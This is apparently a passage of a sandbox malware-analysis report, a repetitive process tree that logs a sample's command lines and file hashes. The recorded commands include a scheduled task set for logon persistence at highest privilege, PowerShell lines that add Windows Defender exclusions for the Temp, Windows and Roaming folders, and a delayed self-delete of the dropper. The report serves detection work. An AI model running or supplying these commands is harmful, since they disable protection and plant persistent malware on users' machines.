                                                                                                                                                                Target ID:137
                                                                                                                                                                Start time:11:42:46
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:138
                                                                                                                                                                Start time:11:42:46
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:139
                                                                                                                                                                Start time:11:42:46
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x5e0000
                                                                                                                                                                File size:38'400 bytes
                                                                                                                                                                MD5 hash:A8638A5105C9A663B0D6918D64B3AD21
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:140
                                                                                                                                                                Start time:11:42:46
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:141
                                                                                                                                                                Start time:11:42:46
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:142
                                                                                                                                                                Start time:11:42:47
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:143
                                                                                                                                                                Start time:11:42:47
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:144
                                                                                                                                                                Start time:11:42:47
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\Microsoft\Libs\sihost64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                Imagebase:0x370000
                                                                                                                                                                File size:7'680 bytes
                                                                                                                                                                MD5 hash:7112FD4E6B2CDD13C11B8B04A96769CB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:145
                                                                                                                                                                Start time:11:42:47
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                                                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:146
                                                                                                                                                                Start time:11:42:48
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:147
                                                                                                                                                                Start time:11:42:48
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:148
                                                                                                                                                                Start time:11:42:48
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:149
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:38'400 bytes
                                                                                                                                                                MD5 hash:A8638A5105C9A663B0D6918D64B3AD21
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:150
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:151
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:152
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\choice.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                                Imagebase:0x7ff62e2e0000
                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:153
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:154
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:155
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:156
                                                                                                                                                                Start time:11:42:50
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:157
                                                                                                                                                                Start time:11:42:50
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:158
                                                                                                                                                                Start time:11:42:50
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:159
                                                                                                                                                                Start time:11:42:50
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\Microsoft\Libs\sihost64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                Imagebase:0x380000
                                                                                                                                                                File size:7'680 bytes
                                                                                                                                                                MD5 hash:7112FD4E6B2CDD13C11B8B04A96769CB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:160
                                                                                                                                                                Start time:11:42:51
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:161
                                                                                                                                                                Start time:11:42:51
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:162
                                                                                                                                                                Start time:11:42:51
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:163
                                                                                                                                                                Start time:11:42:52
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                                                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:164
                                                                                                                                                                Start time:11:42:52
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:165
                                                                                                                                                                Start time:11:42:52
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:166
                                                                                                                                                                Start time:11:42:53
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:167
                                                                                                                                                                Start time:11:42:54
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:168
                                                                                                                                                                Start time:11:42:54
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:169
                                                                                                                                                                Start time:11:42:54
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:170
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:171
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:172
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:173
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\choice.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                                Imagebase:0x7ff62e2e0000
                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:174
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:175
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:176
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:177
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:178
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:179
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:180
                                                                                                                                                                Start time:11:42:57
                                                                                                                                                                Start date:27/09/2024
